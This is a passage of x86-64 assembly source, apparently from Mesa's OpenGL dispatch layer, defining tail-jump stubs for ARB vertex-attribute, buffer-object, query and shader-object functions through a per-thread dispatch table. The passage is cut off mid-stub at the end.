	.globl GL_PREFIX(VertexAttrib4usvARB)
	.type GL_PREFIX(VertexAttrib4usvARB), @function
GL_PREFIX(VertexAttrib4usvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3976(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3976(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3976(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3976(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4usvARB), .-GL_PREFIX(VertexAttrib4usvARB)
/* glVertexAttribPointerARB dispatch stub: tail-jumps through byte
   offset 3984 of the current dispatch table.  Non-TLS paths preserve
   all six integer argument registers %rdi/%rsi/%rdx/%rcx/%r8/%r9
   across the lookup call; the extra %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttribPointerARB)
	.type GL_PREFIX(VertexAttribPointerARB), @function
GL_PREFIX(VertexAttribPointerARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3984(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3984(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3984(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3984(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttribPointerARB), .-GL_PREFIX(VertexAttribPointerARB)
/* glBindBufferARB dispatch stub: tail-jumps through byte offset 3992
   of the current dispatch table.  Non-TLS paths preserve %rdi/%rsi
   across the lookup call; the %rbp push is stack padding only (keeps
   %rsp 16-byte aligned at the call), not a frame pointer.  Fallback
   uses the cached _glapi_Dispatch pointer, calling _glapi_get_dispatch
   only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(BindBufferARB)
	.type GL_PREFIX(BindBufferARB), @function
GL_PREFIX(BindBufferARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3992(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3992(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3992(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3992(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(BindBufferARB), .-GL_PREFIX(BindBufferARB)
/* glBufferDataARB dispatch stub: tail-jumps through byte offset 4000
   of the current dispatch table.  Non-TLS paths preserve the integer
   argument registers %rdi/%rsi/%rdx/%rcx across the lookup call; the
   extra %rbp push is stack padding only (keeps %rsp 16-byte aligned at
   the call), not a frame pointer.  Fallback uses the cached
   _glapi_Dispatch pointer, calling _glapi_get_dispatch only when the
   cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(BufferDataARB)
	.type GL_PREFIX(BufferDataARB), @function
GL_PREFIX(BufferDataARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4000(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4000(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4000(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4000(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(BufferDataARB), .-GL_PREFIX(BufferDataARB)
/* glBufferSubDataARB dispatch stub: tail-jumps through byte offset
   4008 of the current dispatch table.  Non-TLS paths preserve the
   integer argument registers %rdi/%rsi/%rdx/%rcx across the lookup
   call; the extra %rbp push is stack padding only (keeps %rsp 16-byte
   aligned at the call), not a frame pointer.  Fallback uses the cached
   _glapi_Dispatch pointer, calling _glapi_get_dispatch only when the
   cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(BufferSubDataARB)
	.type GL_PREFIX(BufferSubDataARB), @function
GL_PREFIX(BufferSubDataARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4008(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4008(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4008(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4008(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(BufferSubDataARB), .-GL_PREFIX(BufferSubDataARB)
/* glDeleteBuffersARB stub: tail-jump through the dispatch-table entry at byte offset 4016. */
.p2align 4,,15
.globl GL_PREFIX(DeleteBuffersARB)
.type GL_PREFIX(DeleteBuffersARB), @function
GL_PREFIX(DeleteBuffersARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4016(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4016(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4016(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rsi
popq %rdi
movq 4016(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteBuffersARB), .-GL_PREFIX(DeleteBuffersARB)
/* glGenBuffersARB stub: tail-jump through the dispatch-table entry at byte offset 4024. */
.p2align 4,,15
.globl GL_PREFIX(GenBuffersARB)
.type GL_PREFIX(GenBuffersARB), @function
GL_PREFIX(GenBuffersARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4024(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4024(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4024(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rsi
popq %rdi
movq 4024(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenBuffersARB), .-GL_PREFIX(GenBuffersARB)
/* glGetBufferParameterivARB stub: tail-jump through the dispatch-table entry at byte offset 4032. */
.p2align 4,,15
.globl GL_PREFIX(GetBufferParameterivARB)
.type GL_PREFIX(GetBufferParameterivARB), @function
GL_PREFIX(GetBufferParameterivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4032(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4032(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4032(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4032(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetBufferParameterivARB), .-GL_PREFIX(GetBufferParameterivARB)
/* glGetBufferPointervARB stub: tail-jump through the dispatch-table entry at byte offset 4040. */
.p2align 4,,15
.globl GL_PREFIX(GetBufferPointervARB)
.type GL_PREFIX(GetBufferPointervARB), @function
GL_PREFIX(GetBufferPointervARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4040(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4040(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4040(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4040(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetBufferPointervARB), .-GL_PREFIX(GetBufferPointervARB)
/* glGetBufferSubDataARB stub: tail-jump through the dispatch-table entry at byte offset 4048. */
.p2align 4,,15
.globl GL_PREFIX(GetBufferSubDataARB)
.type GL_PREFIX(GetBufferSubDataARB), @function
GL_PREFIX(GetBufferSubDataARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4048(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4048(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4048(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4048(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetBufferSubDataARB), .-GL_PREFIX(GetBufferSubDataARB)
/* glIsBufferARB stub: tail-jump through the dispatch-table entry at byte offset 4056. */
.p2align 4,,15
.globl GL_PREFIX(IsBufferARB)
.type GL_PREFIX(IsBufferARB), @function
GL_PREFIX(IsBufferARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4056(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save the lone arg register; one push also keeps %rsp 16-aligned */
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4056(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4056(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdi
movq 4056(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsBufferARB), .-GL_PREFIX(IsBufferARB)
/* glMapBufferARB stub: tail-jump through the dispatch-table entry at byte offset 4064. */
.p2align 4,,15
.globl GL_PREFIX(MapBufferARB)
.type GL_PREFIX(MapBufferARB), @function
GL_PREFIX(MapBufferARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4064(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4064(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4064(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rsi
popq %rdi
movq 4064(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MapBufferARB), .-GL_PREFIX(MapBufferARB)
/* glUnmapBufferARB stub: tail-jump through the dispatch-table entry at byte offset 4072. */
.p2align 4,,15
.globl GL_PREFIX(UnmapBufferARB)
.type GL_PREFIX(UnmapBufferARB), @function
GL_PREFIX(UnmapBufferARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4072(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save the lone arg register; one push also keeps %rsp 16-aligned */
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4072(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4072(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdi
movq 4072(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UnmapBufferARB), .-GL_PREFIX(UnmapBufferARB)
/* glBeginQueryARB stub: tail-jump through the dispatch-table entry at byte offset 4080. */
.p2align 4,,15
.globl GL_PREFIX(BeginQueryARB)
.type GL_PREFIX(BeginQueryARB), @function
GL_PREFIX(BeginQueryARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4080(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4080(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4080(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rsi
popq %rdi
movq 4080(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BeginQueryARB), .-GL_PREFIX(BeginQueryARB)
/* glDeleteQueriesARB stub: tail-jump through the dispatch-table entry at byte offset 4088. */
.p2align 4,,15
.globl GL_PREFIX(DeleteQueriesARB)
.type GL_PREFIX(DeleteQueriesARB), @function
GL_PREFIX(DeleteQueriesARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4088(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4088(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4088(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rsi
popq %rdi
movq 4088(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteQueriesARB), .-GL_PREFIX(DeleteQueriesARB)
/* glEndQueryARB stub: tail-jump through the dispatch-table entry at byte offset 4096. */
.p2align 4,,15
.globl GL_PREFIX(EndQueryARB)
.type GL_PREFIX(EndQueryARB), @function
GL_PREFIX(EndQueryARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4096(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save the lone arg register; one push also keeps %rsp 16-aligned */
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4096(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4096(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdi
movq 4096(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EndQueryARB), .-GL_PREFIX(EndQueryARB)
/* glGenQueriesARB stub: tail-jump through the dispatch-table entry at byte offset 4104. */
.p2align 4,,15
.globl GL_PREFIX(GenQueriesARB)
.type GL_PREFIX(GenQueriesARB), @function
GL_PREFIX(GenQueriesARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4104(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4104(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4104(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rsi
popq %rdi
movq 4104(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenQueriesARB), .-GL_PREFIX(GenQueriesARB)
/* glGetQueryObjectivARB stub: tail-jump through the dispatch-table entry at byte offset 4112. */
.p2align 4,,15
.globl GL_PREFIX(GetQueryObjectivARB)
.type GL_PREFIX(GetQueryObjectivARB), @function
GL_PREFIX(GetQueryObjectivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4112(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4112(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4112(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4112(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetQueryObjectivARB), .-GL_PREFIX(GetQueryObjectivARB)
/* glGetQueryObjectuivARB stub: tail-jump through the dispatch-table entry at byte offset 4120. */
.p2align 4,,15
.globl GL_PREFIX(GetQueryObjectuivARB)
.type GL_PREFIX(GetQueryObjectuivARB), @function
GL_PREFIX(GetQueryObjectuivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4120(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4120(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4120(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4120(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetQueryObjectuivARB), .-GL_PREFIX(GetQueryObjectuivARB)
/* glGetQueryivARB stub: tail-jump through the dispatch-table entry at byte offset 4128. */
.p2align 4,,15
.globl GL_PREFIX(GetQueryivARB)
.type GL_PREFIX(GetQueryivARB), @function
GL_PREFIX(GetQueryivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4128(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4128(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4128(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4128(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetQueryivARB), .-GL_PREFIX(GetQueryivARB)
/* glIsQueryARB stub: tail-jump through the dispatch-table entry at byte offset 4136. */
.p2align 4,,15
.globl GL_PREFIX(IsQueryARB)
.type GL_PREFIX(IsQueryARB), @function
GL_PREFIX(IsQueryARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4136(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save the lone arg register; one push also keeps %rsp 16-aligned */
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4136(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4136(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdi
movq 4136(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsQueryARB), .-GL_PREFIX(IsQueryARB)
/* glAttachObjectARB stub: tail-jump through the dispatch-table entry at byte offset 4144. */
.p2align 4,,15
.globl GL_PREFIX(AttachObjectARB)
.type GL_PREFIX(AttachObjectARB), @function
GL_PREFIX(AttachObjectARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4144(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4144(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4144(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rsi
popq %rdi
movq 4144(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(AttachObjectARB), .-GL_PREFIX(AttachObjectARB)
/* glCompileShaderARB stub: tail-jump through the dispatch-table entry at byte offset 4152. */
.p2align 4,,15
.globl GL_PREFIX(CompileShaderARB)
.type GL_PREFIX(CompileShaderARB), @function
GL_PREFIX(CompileShaderARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4152(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save the lone arg register; one push also keeps %rsp 16-aligned */
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4152(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4152(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdi
movq 4152(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompileShaderARB), .-GL_PREFIX(CompileShaderARB)
/* glCreateProgramObjectARB stub (no args): tail-jump through the dispatch-table entry at byte offset 4160. */
.p2align 4,,15
.globl GL_PREFIX(CreateProgramObjectARB)
.type GL_PREFIX(CreateProgramObjectARB), @function
GL_PREFIX(CreateProgramObjectARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4160(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp	/* pad only (no args to save): realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
movq 4160(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4160(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
movq 4160(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CreateProgramObjectARB), .-GL_PREFIX(CreateProgramObjectARB)
/* glCreateShaderObjectARB stub: tail-jump through the dispatch-table entry at byte offset 4168. */
.p2align 4,,15
.globl GL_PREFIX(CreateShaderObjectARB)
.type GL_PREFIX(CreateShaderObjectARB), @function
GL_PREFIX(CreateShaderObjectARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4168(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save the lone arg register; one push also keeps %rsp 16-aligned */
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4168(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4168(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdi
movq 4168(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CreateShaderObjectARB), .-GL_PREFIX(CreateShaderObjectARB)
/* glDeleteObjectARB stub: tail-jump through the dispatch-table entry at byte offset 4176. */
.p2align 4,,15
.globl GL_PREFIX(DeleteObjectARB)
.type GL_PREFIX(DeleteObjectARB), @function
GL_PREFIX(DeleteObjectARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4176(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save the lone arg register; one push also keeps %rsp 16-aligned */
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4176(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4176(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdi
movq 4176(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteObjectARB), .-GL_PREFIX(DeleteObjectARB)
/* glDetachObjectARB stub: tail-jump through the dispatch-table entry at byte offset 4184. */
.p2align 4,,15
.globl GL_PREFIX(DetachObjectARB)
.type GL_PREFIX(DetachObjectARB), @function
GL_PREFIX(DetachObjectARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4184(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4184(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4184(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rsi
